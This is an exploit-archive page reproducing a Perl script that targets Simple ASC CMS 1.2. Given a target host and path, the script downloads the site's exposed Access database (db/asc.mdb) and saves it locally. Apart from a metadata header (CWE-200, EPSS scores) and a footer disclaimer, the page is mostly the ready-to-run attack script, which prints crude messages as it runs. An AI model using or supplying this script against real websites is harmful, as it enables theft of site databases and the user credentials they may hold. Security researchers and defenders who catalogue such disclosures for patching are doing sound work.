Advertisement






Simple ASC CMS 1.2 Database Disclosure Exploit

CVE Category Price Severity
N/A CWE-200 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-01-19
CPE
cpe:cpe:/a:simple_asc_cms:simple_asc_cms:1.2
CVSS EPSS EPSSP
No CVSS score available for this exploit 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010190

Below is a copy:

Simple ASC CMS 1.2 Database Disclosure Exploit
========================================================================
| # Title     : Simple ASC CMS 1.2 Database Disclosure Exploit
| # Author    : indoushka
| # email     : [email protected]
| # Tested on : windows 8.1 Franais V.(Pro)
| # Vendor    : http://www.aspsource.org
========================================================================

#!/usr/bin/perl -w
# Author : indoushka

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Simple ASC CMS 1.2 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="db/asc.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/asc.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/asc.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum